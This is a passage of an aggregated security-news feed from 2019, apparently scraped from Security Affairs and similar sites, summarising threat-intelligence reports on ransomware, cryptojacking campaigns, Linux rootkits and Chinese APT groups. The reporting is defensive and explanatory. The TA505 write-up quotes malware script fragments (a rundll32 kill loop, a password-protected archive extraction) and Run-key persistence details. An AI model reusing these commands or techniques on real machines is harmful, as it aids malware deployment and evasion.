(SecurityAffairs – GandCrab ransomware, malware)

The post GandCrab operators are shutting down their operations appeared first on Security Affairs.

Cryptojacking campaign uses Shodan to scan for Docker hosts to hack

A new cryptojacking campaign was spotted by experts at Trend Micro, crooks are using Shodan to scan for Docker hosts with exposed APIs.

Threat actors are using the popular Shodan search engine to find Docker hosts and abuse them in a crypojacking campaign. Attackers leverage self-propagating Docker images infected with Monero miners and scripts that use of Shodan to find other vulnerable installs and compromise them.

The experts discovered the attacks after they have set up a machine that simulated a Docker host with an exposed API.

“We discovered that the images are first deployed using a script (, detected as PUA.Linux.XMRMiner.AA.component) that checks hosts with publicly exposed APIs. It then uses Docker commands (POST /containers/create) to remotely create the malicious container. This script also starts an SSH daemon inside the container for remote communication.” reads the analysis published by Trend Micro.

“The script then calls a Monero coin-mining binary, darwin (detected as PUA.Linux.XMRMiner.AA), to run in the background. As with all cryptocurrency miners, it uses the resources of the host system to mine cryptocurrency (Monero in this instance) without the owner’s knowledge.”

docker cryptojacking

The scripts used by the hackers in this campaign scan for vulnerable hosts via Shodan. They scan for hosts with the 2375 port open and deploy more infected containers to the host after brute-forcing them.

Exposed APIs allow the attacker to execute commands on the Docker hosts which allow them to manage containers, and of course, deploy infected images from a Docker Hub repository under their control.

The analysis of the logs and traffic data coming to and from the honeypot, revealed that the attackers used a container from a public Docker Hub repository named zoolu2. Researchers discovered that the repository contained nine images comprised of custom-made shells, Python scripts, configuration files, as well as Shodan and cryptocurrency-mining binaries.

The good news is that Docker discovered the same repository independently and took it offline.

The same threat actors used also another Docker Hub repository, associated with the ‘marumira‘ account, in previous attacks. Once this account was deactivated threat actors moved to zoolu2.

While the attackers launch a scanning process for Docker hosts to compromise, a custom built Monero coin-mining binary is executed in the background.

“An interesting characteristic of the attack is that it uses a cryptocurrency miner that it is being built from scratch instead of an existing one.” continues the report.

Every time an exposed Docker host is discovered, it is added to a list (iplist.txt file), then attackers sort it for unique IPs. It also checks if the Docker host already runs a cryptocurrency-mining container and delete it if it exists.

The above list is sent to the C2 servers to deploy additional containers to other exposed hosts based on the IP list.

Attacks like the one detected by Trend Micro are not a novelty in the threat landscape, a similar campaign was also spotted by researchers from Imperva in early March.

The same malicious campaign was also analyzed by the Alibaba Cloud Security team that tracked it as Xulu.

“These threats are often successful, not only due to the exploitation of flaws and vulnerabilities in the container software but also due to misconfiguration, which remains a constant challenge for organizations. In this case, the hosts that have exposed APIs are not just victims of cryptocurrency-mining operations — they also contribute further to the distribution of the infected containers.” concludes Trend Micro.

“Unwanted cryptocurrency-mining activity can lead to additional resource load for the targets. In this example, if the Docker host is running on internal infrastructure, other hosts can also suffer. On the other hand, if the Docker host is using a cloud service provider, the organization can accrue additional charges due to the higher resource usage.”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Docker, hacking)

The post Cryptojacking campaign uses Shodan to scan for Docker hosts to hack appeared first on Security Affairs.

HiddenWasp, a sophisticated Linux malware borroes from Mirai and Azazel

Security experts at Intezer have discovered a new Linux malware tracked as ‘HiddenWasp’ that borrows from Mirai, Azazel malicious codes.

HiddenWasp is a new sophisticated Linux malware still undetected by the majority of anti-virus solutions. According to the experts at Intezer, the malware was involved in targeted attacks.  

“Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control.” reads the analysis published by Intezer.

“Evidence shows in high probability that the malware is used in targeted attacks for victims who are already under the attacker’s control, or have gone through a heavy reconnaissance.”

Researchers from Intezer said that most of HiddenWasp’s code is unique, anyway the authors borrowed chunks of code publicly available open-source malware, such as Mirai and the Azazel rootkit

Like the Linux variant of the Winnti backdoor recently documented by Chronicle, HiddenWasp is composed of a user-mode rootkit, a Trojan, and a script for the initial deployment. 

The script allows the malware to achieve persistence, it creates a new system’s user account and to update older variants if the system was already compromised. Then the script downloads a Tar archive that contains the rootkit, the Trojan, and the initial deployment script. 

“The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script” continues the experts.

Once installed the malware components, the main Trojan binary will be executed and the rootkit is added to the LD_PRELOAD mechanism. The malicious code also set up various environment variables and the script attempts to gain persistence by adding the trojan to /etc/rc.local.

“It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN.” continues the experts. “We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code. “

Researchers also found that the HiddenWasp’s rootkit uses an algorithm similar to the one used by the infamous Mirai.

The rootkit is a user-space based rootkit enforced via LD_PRELOAD mechanism that is delivered in the form of an ET_DYN stripped ELF binary.

Experts linked the Trojan component with ChinaZ’s Elknot malware and other ChinaZ implants, a circumstance that suggests that the author of the HiddenWasp may have integrated some modified versions of the Elknot malware that could have been shared in Chinese hacking forums. 

Some artifacts found by the experts also belong to Chinese open-source rootkit for Linux Adore-ng likely because systems targeted with the HiddenWasp might have been previously compromised with this open-source rootkit. 

“Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats.” concludes the report.

“Linux malware will continue to become more complex over time and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility.”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – HiddenWasp, Linux malware)

The post HiddenWasp, a sophisticated Linux malware borroes from Mirai and Azazel appeared first on Security Affairs.

Researchers fight ransomware attacks by leveraging properties of flash-based storage

Ransomware continues to pose a serious threat to organizations of all sizes. In a new paper, “Project Almanac: A Time-Traveling Solid State Drive,” University of Illinois students Chance Coats and Xiaohao Wang and Assistant Professor Jian Huang from the Coordinated Science Laboratory look at how they can use the commodity storage devices already in a computer, to save the files without having to pay the ransom. Recovering data encrypted by a variety of ransomware families … More

The post Researchers fight ransomware attacks by leveraging properties of flash-based storage appeared first on Help Net Security.

Is This The Start Of Open Source Malware for Linux?

Linux is considered a more secure and privacy-focused operating system than Windows, not only because of a low market share (only 2% of all installed desktop operating system) but also due to its very architecture that is patterned after Unix. However, a device cannot approach absolute security while also connected to the Internet, that in itself is a contradiction of terms, this is regardless of the operating system used. Intezer Labs, represented by its security researchers, Ignacio Sanmillan has revealed that a malware named as HiddenWasp specifically designed to target Linux machines, infecting its victims with a rootkit-like process. Chinese hacker group used a malware named Winnti to perform the same attack against Linux previously, which made Sanmillan accuse HiddenWasp as a creation of the same group.

“We found some of the environment variables used in an open-source rootkit known as Azazel. In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that actors behind HiddenWasp may have integrated and modified some MD5 implementation from [the] Elknot [malware] that could have been shared in Chinese hacking forums,” explained Sanmillan.

Intezer Labs researchers investigated the Adore-ng rootkit, it is an open source software which a certain portion of the code was used for Mirai malware previously. A small portion of the rootkit properties is similar to Azazel rootkit. HiddenWasp contains a rootkit component that closely resembles Adore-ng. “We observed that [the HiddenWasp] files were uploaded to VirusTotal using a path containing the name of a Chinese-based forensics company known as Shen Zhou Wang Yun Information Technology Co., Ltd. Furthermore, the malware implants seem to be hosted in servers from a physical server hosting company known as ThinkDream located in Hong Kong,” added Sanmillan.

As of this writing, Sanmillan’s team is still not aware of what the Chinese group is behind the development of the malware. It takes a lot of effort to infect a Linux system, as the user requires typing the root password in order to install software deep into the system. Since the user has no root access by default in a Linux system, all HiddenWasp can do is install its rootkit component as a user-level process. The team continues to investigate the malware, as the component of the second payload is not yet known, but most probably it has something to do with the RAT-module for HiddenWasp.

“Unfortunately, I don’t know what is the initial infection vector. Based on our research, it seems most likely that this malware was used in compromised systems already controlled by the attacker. From our research, it looks like an implant from a targeted attack. It’s hard to say if it’s used by [a] nation-sponsored attacker or someone else, but it is definitely not the usual DDOS/mining malware for quick profits,” concluded Sanmillan.

Intezer has published a comprehensive article in their official blog detailing the minute-to-minute operations of HiddenWasp the moment it arrives in a vulnerable Linux installation. The open source nature of Linux being matched by a somewhat “open source” malware in HiddenWasm may start a new trend of having an open source version of malware targeting Linux hosts.

Also, Read:

5 Ways to Safeguard yourself from Linux Malware

What is Linux Malware? Here’s what you need to know about it

The Best 10 Linux Distro for Penetration Testing

Trickbot, Fast Becoming the Malware Of The Year?

Nasty Side-Channel Attack Vulnerability (Again) In Windows & Linux Discovered

The post Is This The Start Of Open Source Malware for Linux? appeared first on .

10 years of virtual dynamite: A high-level retrospective of ATM malware

It has been 10 years since the discovery of Skimer, first malware specifically designed to attack automated teller machines (ATMs). At the time, the learning curve for understanding its functionality was rather steep and analysis required specific knowledge of a manufacturer’s ATM API functions and parameters, which were not publicly documented.

Before the discovery of Skimer, anti-malware researchers’ considered ATMs secure machines containing proprietary hardware, running non-standard operating systems, and implementing a number of advanced protection techniques designed to prevent attacks using malicious code. Researchers eventually discovered that the most popular ATM manufacturers use a standard Windows operating system and add on some auxiliary devices, such as a safe and card reader.

Over time, actors behind some of the newer ATM malware families such as GreenDispenser and Tyupkin realized that there is a generic Windows extension for Financial Services API (CEN/XFS) that can be used to make malware that runs independent of the underlying hardware platform, as long as the ATM manufacturer supports the framework. This malware can trick the machines into dispensing cash, regardless of whether the attacker has a legitimate bank card.

Over time, ATM malware has evolved to include a number of different families and different actors behind them, ranging from criminal groups to actors affiliated with nation states. The significance of ATM malware stems from the fact that it can bring significant financial benefits to attackers and as a consequence cause a significant damage to targeted banks, financial institutions and end users.

Now that this type of malware has been around for more than 10 years, we wanted to round up the specific families we’ve seen during that time and attempt to find out if the different families share any code.


The post 10 years of virtual dynamite: A high-level retrospective of ATM malware appeared first on Cisco Blog.

Smashing Security #130: Doctored videos, BCC blunders, and a diva

You won’t believe who had to report themselves to the data protection agency for a breach, or who has been sharing doctored videos of political rivals, or how much money you can make selling a laptop infected with malware… and how Carole gets her diva on.

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, who aren’t joined by a guest this week.

Emissary Panda APT group hit Government Organizations in the Middle East

Chinese Cyber-Spies Target Government Organizations in Middle East

Chinese APT group Emissary Panda has been targeting government organizations in two different countries in the Middle East.

Experts at Palo Alto Networks reported that the Chinese APT group Emissary Panda (aka APT27, TG-3390, Bronze Union, and Lucky Mouse) has been targeting government organizations in two different countries in the Middle East.

The Emissary Panda APT group has been active since 2010, targeted organizations worldwide, including U.S. defense contractors, financial services firms, and a national data center in Central Asia.

Emissary Panda Espionage-r3d1-1024x512

The group was involved in cyber espionage campaigns aimed at new generation weapons and in surveillance activities on dissidents and other civilian groups. 

The cyber espionage group leverage both readily available tools and custom malware in their operations, many tools are available for years, but in recent attacks, their code was updated.

In April 2019, the group targeted organizations of two different countries in the Middle East. Hackers hit webservers to install of webshells on SharePoint servers, threat actors leveraged the CVE-2019-0604 vulnerability to compromise SharePoint servers. 

Once compromised the network, attackers will upload a variety of tools to perform additional activities, including dumping credentials, and locating and pivoting to additional systems on the network.

Experts pointed out that attackers used tools to scan the network for systems vulnerable to CVE-2017-0144, the flaw exploited by the NSA-linked EternalBlue exploit.

The campaign appears related to attacks exploiting CVE-2019-0604 reported by the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security. The report by the Saudi Cyber Security Centre suggests threat actors are primarily targeting organizations within the kingdom. The Canadian Cyber Security Centre reported similar attacks aimed at delivering the China Chopper web-shell to ensure persistence in the target networks.

“the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks. We also found the China Chopper webshell on the SharePoint servers, which has also been used by the Emissary Panda threat group.” states the report published by PaloAlto Networks.a

PaloAlto experts observed between April 1 and April 16, the threat actors-using webshells to upload 24 unique executables on three SharePoint servers hosted by two different government organizations. Experts noticed that the same tools were uploaded across the three webshells, suggesting the involvement of the same attacker. 

The longest activity involving one of the three webshells was observed on April 16, 2019.

The list of the tools uploaded by cyberspies included legitimate applications such as cURL, post-exploitation tools like Mimikatz, tools to scan for and exploit potential vulnerabilities in the target network, and custom backdoors such as HyperBro, which was used by Emissary Panda in the past. 

One of the webshells used by the attackers is a variant of the Antak webshell, other webshells appear related to the China Chopper webshell.

“We were able to gather one of the webshells with which we saw the actor interacting, specifically the error2.aspx file listed above. The error2.aspx file (SHA256: 006569f0a7e501e58fe15a4323eedc08f9865239131b28dc5f95f750b4767b38) is a variant of the Antak webshell, which is part of a tool created for red teaming called Nishang. ” continues the report.

Cyber spies also uncovered the use of additional sideloaded DLLs in this campaign. 

“The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East, which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604,” Palo Alto Networks concludes. 

“Once the adversary established a foothold on the targeted network, they used China Chopper and other webshells to upload additional tools to the SharePoint server to dump credentials, perform network reconnaissance and pivot to other systems.  “

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – cyberespionage, Emissary Panda)

The post Emissary Panda APT group hit Government Organizations in the Middle East appeared first on Security Affairs.

Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers

Guardicore Labs uncovered a widespread cryptojacking campaign tracked as Nansh0u and aimed at Windows MS-SQL and PHPMyAdmin servers.

Security experts at Guardicore Labs uncovered a widespread cryptojacking campaign leveraging a malware dubbed Nansh0u. The malicious code aimed at Windows MS-SQL and PHPMyAdmin servers worldwide.

According to the experts, the malicious campaign is being carried out by a Chinese APT group.

According to the experts Nansh0u malware has already infected nearly 50,000 servers worldwide. Threat actors also delivered a sophisticated kernel-mode rootkit on compromised systems to prevent the malware from being terminated.

“During the past two months, the Guardicore Labs team has been closely following a China-based campaign which aimed to infect Windows MS-SQL and PHPMyAdmin servers worldwide.” reads the report published by Guardicore.

“Breached machines include over 50,000 servers belonging to companies in the healthcare, telecommunications, media and IT sectors. Once compromised, the targeted servers were infected with malicious payloads. These, in turn, dropped a crypto-miner and installed a sophisticated kernel-mode rootkit to prevent the malware from being terminated.”

The attacks date back to February 26, experts observed over seven hundred new victims per day. Researchers discovered 20 versions of malicious payloads, with new payloads created at least once a week and immediately involved in the campaign after their creation time.

nansh0u infections

Threat actors use to launch brute-force attacks against previously identified Windows MS-SQL and PHPMyAdmin servers that are exposed online.

Once successfully logged in with administrative privileges, threat actors execute a sequence of MS-SQL commands that allow them to download malicious payload from a remote file server and execute it with SYSTEM privileges.

Attackers used two exploits tracked as apexp.exe and apexp2012.exe that trigger the privilege escalation vulnerability CVE-2014-4113. The exploits allow running any executable with SYSTEM privileges.

“Using this Windows privilege, the attacking exploit injects code into the winlogon process. The injected code creates a new process which inherits winlogon’s SYSTEMprivileges, providing equivalent permissions as the prior version.” continues the analysis.

The payloads used in this campaign were droppers used to deliver a cryptocurrency miner to mine TurtleCoin cryptocurrency.

Experts observed many payloads dropping a kernel-mode driver using ransom file names and placed them in AppData/Local/Temp. The compile time for these files suggests that it had been created in 2016, but most AV engines still not detect them as malicious.

The driver had a digital signature issued by the top Certificate Authority Verisign

We can confidently say that this campaign has been operated by Chinese attackers.” concludes the report.

We base this hypothesis on the following observations:

  • The attacker chose to write their tools with EPL, a Chinese-based programming language.
  • Some of the file servers deployed for this campaign are HFSs in Chinese.
  • Many log files and binaries on the servers included Chinese strings, such as 结果-去重复 (“duplicates removed”) in logs containing breached machines, or 开始 (“start”) in the name of the script initiating port scans.”

Experts also published a list of IoCs (indicators of compromise) and a free PowerShell-based script that could be used by Windows admins to check whether their systems are infected or not.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – nansh0u malware, hacking)

The post Nansh0u campaign already infected 50,000 MS-SQL and PHPMyAdmin Servers appeared first on Security Affairs.

When it comes to email-based threats, Emotet dominates

Emotet displaced credential stealers, stand-alone downloaders and RATs and became the most prominent threat delivered via email, Proofpoint has shared. According to the firm’s statistics, in Q1 2019 a whooping 61 percent of all malicious payloads distributed via email were Emotet. The nature of the malicious payloads Emotet started its life as a banking Trojan, but has morphed over time and became a malware multi-tool, capable of downloading additional malware, stealing passwords, performing brute-force attacks … More

The post When it comes to email-based threats, Emotet dominates appeared first on Help Net Security.

TA505 is expanding its operations

An attack against an Italian organization lead the experts at Yoroi-Cybaze ZLab to shed the light on ongoing operations attributed to TA505.


In the last few days, during monitoring activities, Yoroi CERT noticed a suspicious attack against an Italian organization. The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution, discovering a potential expansion of the TA505 operation. The threat group is also known for its recent attack campaign against Bank and Retail business sectors, but the latest evidence indicates a potential expansion of its criminal operation to other industries too.

Technical Analysis

Brief DescriptionExcel file with malicious macro
Ssdeep3072:Mc38TehYTdeHVhjqabWHLtyeGxml8/dgzxXYhh3vVYwrq 8/P5HKuPF1+bkm13Kkf:B38TehYTdeHVhjqabWHLty/xml8/dgNr

Table 1. Information about initial dropper

The intercepted attack starts with a spear-phishing email embedding a spreadsheet. The document is weaponized with malicious macro code triggered when the user opens the document to see the content under the obfuscated view.

Figure 1. XLS document

To understand its capabilities, the macro code has been isolated and analyzed in detail. Part of the macro’s content is shown in the following figure.

Figure 2. Part of extracted macro

Surprisingly, the source code is composed by more than 1600 lines of code and it is highly obfuscated. Paying more attention during the code analysis, we discovered that it is full of junk instructions used to declare and initialize variables never used, as shown in Figure 2. Only a small portion of this code is actually used to start the infection, the rest is just junk code.

Figure 3. Example of junk instructions used in macro

Once the macro is executed, the malware downloads two files from “kentona[.su”, using an SSL encrypted communication, and stores them in “C:\Users\Public” path: “rtegre.exe” and “wprgxyeqd79.exe”.

Brief DescriptionTrojan/Downloader (Executable file)
Ssdeep12288:3gL3qJxG5hfNV6oYYbDRcY4KhbmwPMCchbjBxwhrVm HAyzNkyRJK7hRMCQ:3mqkhfzYZY4kmgsbdm2HAENk0K7Dm

Table 2. Information about “rtegre.exe” downloaded from “kentona[.su”

Brief DescriptionSFX (self-extracting archive) (Executable file)
Ssdeep49152:sIWB74MncmEWy4i1LkjoAwG2PI/mfqtftvMKcr+7Ao95 xQW1vB38PELaacVzWTV3:sICtHsJoMAwG

Table 3. Information about “wprgxyeqd79.exe” (SFX) downloaded from “kentona[.su”

Figure 4. Files contained in “wprgxyeqd79.exe” (SFX)

The “wprgxyeqd79.exe” sample actually is a Self Extracting Archive (SFX/SFA) containing four files designed to be extracted in the %TEMP% folder. After that, it executes “exit.exe” which launches the “i.cmd” batch script.  

Figure  5. “i.cmd” script contained in “pasmmm.exe”

This new script performs a ping to “www[.cloudflare[.com” for three times with a delay of 3000ms, testing the connectivity of the victim machine. If the host is successfully reached, the script renames a file named “kernel.dll”, obviously not the real one, in “uninstall.exe”, another misleading name. Then it invokes the renamed executable and runs it passing a series of parameter: “uninstall.exe x -pQELRatcwbU2EJ5 -y”

These parameters are needed to self-decrypt the “uninstall.exe” file which is again another SFX archive. The “-p” parameter, indeed, specify the password of the archive to be extracted. The crucial file, at this point of the infection, is the SFX executable named “uninstall.exe”. It has a structure similar to previous “wprgxyeqd79.exe” file: two of their files have the same name, but the content of this new SFX is extracted in the “%ALLUSERSPROFILE%\Windows Anytime Upgrade” directory.

Figure 6. Files contained in “uninstall.exe” (SFX)

Another time, the execution flow moves from “exit.exe to “i.cmd”. The script is quite different from the previous one: it guarantees its persistence on the victim machine through the setting of “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key, creating a new entry named “Windows Anytime Upgrade” which points to “winserv.exe”, just stored into the same folder. Thus, the script provides to run “winserv.exe”.

Figure 7. “i.cmd” script contained in “uninstall.exe”

An interesting part of the script is the continuous killing of every “rundll32.exe” process running into the victim machine, generates a huge amount of noise, as visible in the following process explorer view.

taskkill /f /im “rundll32.exe” || goto :Repeat

Figure 8. List of malware’s processes

Anyway, just before the kill loop, the real malicious payload is executed: the  “winserv.exe” file. Analyzing it in depth, we discover it actually is the RMS (Remote Manipulator System) client by TektonIT, encrypted using the MPress PE compressor utility, a legitimate tool, to avoid antivirus detection.

Figure 9. Information about MPress packer used in “winserv.exe” payload

TektonIT RMS acts as a remote administration tool, allowing the attacker to gain complete access to the victim machine. Together with the RMS executable, there is another file named “settings.dat”containing the custom configuration prepared by the attacker. It contains information like:

  • Server address and port the client will connect to
  • The password chosen by the attacker for the remote access
  • The ID associated to the victim client

All these information are automatically loaded by the RMS executable and firstly stored in the registry key “HKCU\Software\tektonik\Remote MANIPULATOR System\Host\parameters”. At the next startup, the software will directly load the configuration from the just created key.

Figure 10. Registry key set by “winserv.exe” (on the left); “settings.dat” file (on the right)

The client establishes a new connection with the remote command and control server hosted on a Bulgarian remote host, part of a Virtual Dedicated Server subnet of the AS-21100, operated by ITL LLC.

Figure 11. C2’s parameters

The attack is composed by a complex flow we synthesize in the following scheme:

Figure 12. Complete infection chain

The TA505 Connection

After the reconstruction of the full infection chain, we noticed strong similarities with a recent spear-phishing attack campaign against an unspecified US retail company. The attack, as stated by CyberInt, leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world, threatening a wide range of high profile companies, active since 2014.

Figure 13. Comparison between infection chains

The comparison of the infection chains reveals in both cases the attacker used a couple of SFX stages to deploy the “RMS” software: a legitimate remote administration tool produced by the Russian company “TektonIT”. The tool is able to grant remote access and full, direct control of the infected machine to the group. Also, some code pieces are directly re-used in the  analyzed campaigns, such as the “i.cmd” and “exit.exe” files, and, at the same time, some new components have been introduced, for instance the “rtegre.exe” and the “veter1605_MAPS_10cr0.exe” file.

During the analysis, we also noticed the “veter1605_MAPS_10cr0.exe” file slightly changed run after run, a few hours after the initial discovery the infection chain dropped it with different icons, different suffix, from “cr0” to “cr24”, and appendix from “veter1605_” to “veter2005_”. This may indicate the campaign is still ongoing.


The TA505 group is one of the most active threat groups operating since 2014, it has traditionally targeted Banking and Retail industries, as we recently documented during the analysis of the “Stealthy Email Stealer” part of their arsenal. The peculiarity of this recent attack wave is it actually hit a company not strictly in the Banking or Retail sector, as they recently did, suggesting the threat group could be potentially widening their current operations.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Technical details, including IoCs and Yara Rules, are available in the analysis published in the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – TA505, hacking)

The post TA505 is expanding its operations appeared first on Security Affairs.

HawkEye Keylogger is involved in attacks against business users

Experts at IBM X-Force observed a new campaign involving the HawkEye keylogger in April and May 2019 aimed at business users. 

Malware attacks leveraging a new variant of the HawkEye keylogger have been observed by experts at Talos. The malware has been under active development since at least 2013 and it is offered for sale on various hacking forums as a keylogger and stealer. It allows to monitor systems and exfiltrate information.

The latest variant appeared in the cybercrime underground in December 2018, it was named HawkEyeReborn v9. The author is selling it through a licensing model and is also offering access to updates for specific periods of time.

“IBM X-Force researchers report an increase in HawkEye v9 keylogger infection campaigns targeting businesses around the world.” reads the analysis published by Cisco Talos. “In campaigns observed by X-Force in April and May 2019, the HawkEye malware focused on targeting business users, aiming to infect them with an advanced keylogging malware that can also download additional malware to their devices. “

In April 2019, threat actors launched numerous campaigns aimed at targeting industries such as transportation and logistics, healthcare, import and export, marketing, agriculture, and others. 

Attackers delivered the keylogger through malspam campaigns focused on business users. The messages pose as messages sent from a large bank in Spain or fake emails from legitimate companies or from other financial institution.

“X-Force researchers note that the infection process is based on a number of executable files that leverage malicious PowerShell scripts.” continues the post.

Experts noticed that the malspam campaign is originated from Estonia, the malware while experts observed infections worldwide.

A few campaigns X-Force analyzed in April and May 2019 show that the infrastructure the malspam came from is hosted on similar assets.” concludes Cisco. “It is possible that HawkEye operators further pay for other services from the malware’s vendor, or from another cybercrime vendor serving up spamming campaigns,” IBM concluded.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – HawkEye, hacking)


The post HawkEye Keylogger is involved in attacks against business users appeared first on Security Affairs.

Shade Ransomware is very active outside of Russia and targets more English-speaking victims

Experts at PaloAlto Networks spotted a new Shade ransomware campaigns targeting news countries, including in the U.S. and Japan.

Researchers observed a new wave of Shade ransomware attacks against targets in several countries, including the US and Japan.

Shade is considered one of the most dangerous threats in the cyber crime scenario, it has been active at least since 2014 when a massive infection was observed in Russian. The Shade infections increased during October 2018, keeping a constant trend until the second half of December 2018, taking a break around Christmas, and then resuming in mid-January 2019 doubled in size.

“Our results indicate the majority of recent Shade executables have also targeted users outside of Russia.” reads the analysis published by Paloalto Networks.

“In fact, our research shows that the top five countries affected by Shade ransomware are not Russia or nations of the former Soviet Union, they are the United States, Japan, India, Thailand, and Canada,” 

Moth of the victims belongs to high-tech, wholesale and education sectors.

Shade has been distributed through malspam campaigns and exploit kits, experts pointed out that its executable (EXE) remains “remarkably consistent” since its discovery in 2014.

Once a Windows system gets infected with this ransomware, the malicious code sets the desktop background to announce the infection. The ransomware also drops on the Desktop 10 text files, named README1.txt through README10.txt,

“Attention! All the important files on your disks were encrypted. The details can be found in README.txt files which you can find on any of your disks.” reads the message left on the background.

Shade Ransomware 2

The README.txt files include instructions to contact the crooks via an email address in order to receive information on how to make the payments.

The researchers noticed that all the Malspam campaigns spreading the Shade ransomware were retrieving an executable file from a compromised server.

“By focusing on the executable in this chain of events, we can determine where Shade ransomware infection attempts have occurred.” continues the report.

“AutoFocus has a Shade ransomware tag that identifies any items associated with Shade.” explains PaloAlto Networks. “We searched on attempted deliveries of a Shade ransomware executable during an infection chain, and we focused our search on packed executable (PE) files sent through a URL over TCP port 80.”

Experts discovered that most of the URLs hosting Shade ransomware executables were reported from customer devices outside of Russia and Russian language countries.

Technical details, including Indicators of Compromise (IoCs) are reported in the analysis published by the experts.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Shade, ransomware, malware)

The post Shade Ransomware is very active outside of Russia and targets more English-speaking victims appeared first on Security Affairs.

Digital Criminals Abusing Secure Tunneling Service to Deliver Lokibot

Digital criminals have begun abusing a secure tunneling service to deliver samples of the Lokibot banking malware family. My Online Security came across an instance of this campaign when they received an email pretending to originate come from BBVA Banco Continental, a Spanish bank. The email leveraged the lure of a fake payment transfer to […]… Read More

The post Digital Criminals Abusing Secure Tunneling Service to Deliver Lokibot appeared first on The State of Security.

APT-27 like Newcore RAT, Virut exploiting MySQL for targeted attacks on enterprise

In today’s world data is everything, and to store and process this large amount of data, everyone started using computing devices. So, application server’s which are used for storing this precious data on computing devices include MYSQL, MongoDB, MSSQL, etc. But unfortunately, no one is conscious about its security. In…

APT10 is back with two new loaders and new versions of known payloads

The APT10 group has added two new malware loaders to its arsenal and used in attacks aimed at government and private organizations in Southeast Asia.

In April 2019, China-linked cyber-espionage group tracked as APT10 has added two new loaders to its arsenal and used it against government and private organizations in Southeast Asia.

The group has been active at least since 2009, in April 2017 experts from PwC UK and BAE Systems uncovered a widespread hacking campaign, tracked as Operation Cloud Hopper, targeting managed service providers (MSPs) in multiple countries worldwide.

In July 2018, FireEye observed a series of new attacks of the group leveraging spear-phishing emails using weaponized Word documents that attempt to deliver the UPPERCUT backdoor, also tracked as ANEL.

In September 2018, researchers from FireEye uncovered and blocked a campaign powered by the Chinese APT10 cyber espionage group aimed at Japanese media sector

The recent attacks were uncovered by experts at enSilo, they also noticed that the APT group used modified versions of known malware.

“Towards the end of April 2019, we tracked down what we believe to be new activity by APT10, a Chinese cyber espionage group.” reads the analysis published by enSilo. “Both of the loader’s variants and their various payloads that we analyzed share similar Tactics, Techniques, and Procedures (TTPs) and code associated with APT10.”

The two loaders deliver different payloads to the victims and both variants drop the following files beforehand:

  • jjs.exe – legitimate executable, a JVM-based implementation of a javascript engine as part of the Java platform that acted as a loader for the malware.
  • jli.dll – malicious DLL
  • msvcrt100.dll – legitimate Microsoft C Runtime DLL
  • svchost.bin – binary file

Both variants served several final payloads, including the PlugX and Quasar remote access trojan (RAT).

APT10 chinese hackers

The loaders implement DLL Side-Loading, this means it starts by running a legitimate executable which is abused to load a malicious DLL.

Both loaders use the jli.dll library that maps a data file, svchost.bin, to memory and decrypts it to retrieve a shellcode that is injected into svchost.exe and contains the actual malicious payload.

The two loaders differ in the way they ensure persistence, the first uses a service as its persistence method, while the second variant leverages the Run registry key for the current user under the name “Windows Updata” . 

“It goes a long way to completely remove any sign of McAfee’s email proxy service from the infected machine,” Hunter said. “Besides killing the process, it also makes sure to delete any related keys in the registry, and recursively deletes any related files and directories on the machine. The same behavior was observed by in the paranoid variant as part of a VBScript the dropper runs.”

Experts noticed that the payloads used by the attackers in the last campaigns are still on a development phase.

“Both variants of the loader implement the same decryption and injection mechanism.” concludes the experts.

Further technical details, including IoCs, are reported in the analysis published by inSile.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – APT10, hacking)

The post APT10 is back with two new loaders and new versions of known payloads appeared first on Security Affairs.

Bitcoin Rewards As Lures? Tale Of The New Generation Malvertising

